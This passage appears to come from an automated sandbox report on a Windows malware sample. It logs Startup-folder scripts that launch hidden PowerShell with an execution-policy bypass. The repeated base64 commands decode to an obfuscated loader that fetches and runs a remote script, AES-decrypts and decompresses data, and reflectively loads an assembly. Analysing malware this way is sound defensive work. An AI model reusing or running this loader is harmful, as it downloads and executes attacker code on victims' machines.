pwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\sfcepcvxio"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\vhpwquorvxkde"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_76fbe4d0.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5L